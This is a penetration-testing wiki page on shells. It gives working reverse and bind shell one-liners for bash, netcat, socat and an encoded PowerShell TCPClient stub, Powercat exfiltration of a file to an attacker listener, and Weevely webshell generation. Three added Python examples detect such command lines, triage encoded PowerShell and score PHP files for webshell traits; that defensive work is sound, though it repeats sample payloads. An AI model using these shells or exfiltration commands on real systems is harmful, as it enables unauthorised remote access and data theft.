Shells
From pentestwiki.org
Classic methods
bash
Bash reverse shell:
On attacker:
$ nc -nvv -lp 8080
On target:
$ bash -i >& /dev/tcp/$IP/8080 0>&1
netcat
- netcat bindshell
On target:
$ nc -nvvlp 8989 -e /bin/bash
On attacker:
$ nc -nvv $IP 8989
- netcat reverse shell:
On attacker:
$ nc -nvvlp 8989 $IP
On target:
$ nc -nvv $IP 8989 -e /bin/bash
- To improve the shell (Method 1) @JFaust0:
Press Ctrl+Z to background the shell, then:
$ stty raw -echo; fg
Back in the shell:
$ reset
- To improve the interactive shell (Method 2):
$ python -c 'import pty; pty.spawn("/bin/bash")'
socat
Syntax:
$ socat [options] address1 address2
Examples of address:
- - (a bare dash, i.e. stdin/stdout)
- stdio
- tcp4:localhost:1080
- tcp4-listen:8080 = tcp-l:8080
- udp4:host:2049
- udp4-l:500
- exec:/bin/ls,pty
- socks:socks.local:$IP:80
- proxy:proxy.local:$IP:443
- ssl-l:443,cert=./server.pem
- open:file.txt
- create:newfile.txt
- UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
- TUN:192.168.1.2/24,iff-up=1
- Socat bindshell
On target:
$ socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
On attacker:
$ socat FILE:`tty`,raw,echo=0 TCP:$IP:1337
- Socat reverse shell
On attacker:
$ socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
On target:
$ socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
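The bash, netcat and socat one-liners above leave distinctive traces in process-execution telemetry (auditd execve records, EDR command lines): a `/dev/tcp/` redirect, `nc` with `-e`/`--exec`, `socat` with an `EXEC:`/`SYSTEM:` address, or `pty.spawn(`. The following is an added detection example written for this page, not code from pentestwiki.org; it runs a small rule set over constructed sample command lines and tags each hit as a bind or reverse shell by looking for a listening flag or address. The rule names, sample command lines and addresses are all constructed here.

```python
import re

# Constructed sample of process command lines, as an EDR or auditd execve
# collector would report them; these are not captured from a real host.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/203.0.113.5/8080 0>&1",
    "nc -nvvlp 8989 -e /bin/bash",
    "nc -nvv 203.0.113.5 8989 -e /bin/bash",
    'python -c import pty; pty.spawn("/bin/bash")',
    "socat TCP4:203.0.113.5:1337 EXEC:bash,pty,stderr,setsid,sigint,sane",
    "socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane",
    "nc -z 10.0.0.1 22",          # port probe, no shell attached
    "python -c print('hello')",
    "bash -c ls -la /tmp",
]

# Each rule: (name, pattern, is_network). Network rules get a bind/reverse
# direction; the pty rule is a local shell upgrade with no direction.
RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/(tcp|udp)/"), True),
    ("nc-exec", re.compile(r"\b(nc|ncat|netcat)\b.*(\s-e\s|--exec|--sh-exec)"), True),
    ("socat-exec", re.compile(r"\bsocat\b.*\b(EXEC|SYSTEM):", re.I), True),
    ("pty-spawn", re.compile(r"pty\.spawn\("), False),
]

# A listening side shows up as a LISTEN address (socat) or as an option
# cluster containing "l" (nc -l, -nvvlp, ...).
LISTEN_RE = re.compile(r"listen|(^|\s)-[a-z]*l[a-z]*(?=\s|$)", re.I)


def classify(cmdline):
    """Return the names of all rules that match this command line."""
    return [name for name, rx, _ in RULES if rx.search(cmdline)]


def direction(cmdline, rule_names):
    """'bind' or 'reverse' for network rules, 'n/a' for local-only hits."""
    network = any(is_net for name, _, is_net in RULES if name in rule_names)
    if not network:
        return "n/a"
    return "bind" if LISTEN_RE.search(cmdline) else "reverse"


def scan(cmdlines):
    """One finding per command line that matches at least one rule."""
    findings = []
    for cmd in cmdlines:
        hits = classify(cmd)
        if hits:
            findings.append({"cmdline": cmd, "rules": hits,
                             "direction": direction(cmd, hits)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f['direction']:8} {','.join(f['rules']):14} {f['cmdline']}")
```

Run as a script it prints the six hits and skips the three benign lines. In production the same `scan()` would be fed from the execve/command-line stream rather than the constructed list, and the `nc-exec` rule should be paired with a check that `-e` is not a legitimate option of some other binary on the host.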
- Build a VPN with socat:
On server:
root # socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1
On client (where $IP is the server's address):
root # socat tcp:$IP:50500 TUN:192.168.10.3/24,iff-up=1
Windows Powershell
With $LHOST and $LPORT set to the listener's address and port:
PS> $str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS> $b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS> echo "powershell -ep bypass -nop -encodedcommand $b" | clip
Then paste directly (Ctrl+V) into the target terminal.
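Because `-encodedcommand` takes base64 of UTF-16LE text (that is what `[Text.Encoding]::Unicode.GetBytes` produces), a defender seeing such a command line can decode it and look for the markers of the stub above: a `TCPClient`, a `GetStream()` read loop, `iex`, and an `-ep bypass` on the outer command. This is an added triage example written for this page, not code from pentestwiki.org. Both sample command lines are constructed inside the block (one reproducing the shape of the stub with a documentation address, one an ordinary admin one-liner); the indicator names and the two-indicator threshold are assumptions of this example.

```python
import base64
import binascii
import re


def encode_for_powershell(script):
    """Same transform as [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($s)):
    -EncodedCommand expects base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples (not captured from a real host). The first has the
# shape of the stub above; the second is a harmless admin one-liner.
SUSPICIOUS_CMDLINE = (
    "powershell -ep bypass -nop -encodedcommand "
    + encode_for_powershell(
        '$c=New-Object System.Net.Sockets.TCPClient("198.51.100.7",8080);'
        "$s=$c.GetStream();iex $d"
    )
)
BENIGN_CMDLINE = "powershell -nop -encodedcommand " + encode_for_powershell(
    "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"
)

INDICATORS = {
    "tcp-client":    re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "stream-loop":   re.compile(r"\.GetStream\(\)", re.I),
    "dynamic-exec":  re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "policy-bypass": re.compile(r"-(ep|ExecutionPolicy)\s+bypass", re.I),
}
# -e, -ec, -enc and -encodedcommand are all accepted spellings of the switch.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def extract_encoded(cmdline):
    m = ENCODED_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded(blob):
    """Base64 -> UTF-16LE text; None if the blob is malformed or truncated."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline):
    blob = extract_encoded(cmdline)
    if blob is None:
        return {"decoded": None, "indicators": [], "verdict": "no-encoded-command"}
    decoded = decode_encoded(blob)
    if decoded is None:
        return {"decoded": None, "indicators": [], "verdict": "undecodable"}
    # Match the outer switches and the decoded script, never the base64 blob
    # itself (a random run of base64 could otherwise hit a short pattern).
    outer = cmdline.replace(blob, "")
    haystack = outer + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    verdict = "suspicious" if len(hits) >= 2 else "benign"
    return {"decoded": decoded, "indicators": hits, "verdict": verdict}


if __name__ == "__main__":
    for cmd in (SUSPICIOUS_CMDLINE, BENIGN_CMDLINE):
        r = triage(cmd)
        print(r["verdict"], r["indicators"])
        print("   ", r["decoded"])
```

The decoder deliberately reports `undecodable` rather than raising: a blob whose byte count is odd cannot be UTF-16LE and is itself worth a look, since PowerShell would have rejected it too.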
USB man-in-the-middle
- proxy a USB serial device over IP
Remote (machine with the device):
$ socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr
Local:
$ socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:<target>:1337
tsh
Tiny SHell (tsh) is an open-source UNIX backdoor written in C.
Powershell modules
Powercat
Netcat functionality in PowerShell; no extra packages required. Good for data exfiltration.
On target (send input.txt to the attacker's listener):
C:> powershell -exec bypass
PS> Import-Module .\powercat.ps1
PS> powercat -c $IP -p 80 -i input.txt
On attacker machine:
$ nc -vvlp 80 > input.txt
Reference: https://github.com/besimorhino/powercat
Webshells
Weevely
$ python weevely.py generate AbC /var/www/html/AbC.txt
(generates a PHP agent protected by the password AbC at the given path)
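The defensive counterpart to dropping an agent into the webroot is scanning the webroot for webshell-like files. The example below is added for this page and is not code from pentestwiki.org or from the weevely project; it uses generic PHP webshell heuristics (dynamic evaluation, decode layers, command execution, request-controlled input, and PHP code in a file whose extension is not PHP, as in the `.txt` path above), not weevely-specific signatures. The weights, threshold and the three sample files are constructed assumptions of this example.

```python
import os
import re

# Generic PHP webshell indicators with assumed weights; not tool-specific.
INDICATORS = [
    ("eval-or-assert", re.compile(r"\b(eval|assert|create_function)\s*\("), 3),
    ("decode-layer", re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\("), 2),
    ("command-exec", re.compile(
        r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\("), 2),
    ("request-input", re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b"), 1),
]
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")
SUSPICIOUS_THRESHOLD = 4  # assumed cut-off for this example

# Constructed in-memory webroot so the example runs offline.
SAMPLE_WEBROOT = {
    "index.php": "<?php $name = htmlspecialchars($_GET['name'] ?? 'world'); "
                 'echo "Hello $name"; ?>',
    "uploads/AbC.txt": "<?php eval(base64_decode($_POST['c'])); ?>",
    "tools/backup.php": "<?php system('tar czf /tmp/backup.tgz /var/www/html'); ?>",
}


def score_file(name, content):
    """Score one file; reasons are listed in INDICATORS order."""
    score, reasons = 0, []
    for label, rx, weight in INDICATORS:
        if rx.search(content):
            reasons.append(label)
            score += weight
    # PHP code in a file whose extension says it is not PHP is itself a signal.
    if "<?php" in content and not name.lower().endswith(PHP_EXTENSIONS):
        reasons.append("php-in-non-php-file")
        score += 2
    return {"file": name, "score": score, "reasons": reasons,
            "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "clean"}


def scan_files(files):
    """files: {relative path: content}. Findings sorted by score, highest first."""
    return sorted((score_file(n, c) for n, c in files.items()),
                  key=lambda f: f["score"], reverse=True)


def scan_webroot(root):
    """Same scoring over an on-disk tree; unreadable files are skipped."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            path = os.path.join(dirpath, n)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(path, root)] = fh.read()
            except OSError:
                continue
    return scan_files(files)


if __name__ == "__main__":
    for f in scan_files(SAMPLE_WEBROOT):
        print(f"{f['score']:2} {f['verdict']:10} {f['file']}  {f['reasons']}")
```

`backup.php` scores below the threshold but still surfaces `command-exec`, which is the point of returning every reason rather than a bare verdict: a reviewer decides whether a legitimate maintenance script belongs in the webroot at all. Obfuscated agents that build function names at runtime will not match these literal patterns, so treat a clean result as "nothing obvious", not as proof of absence.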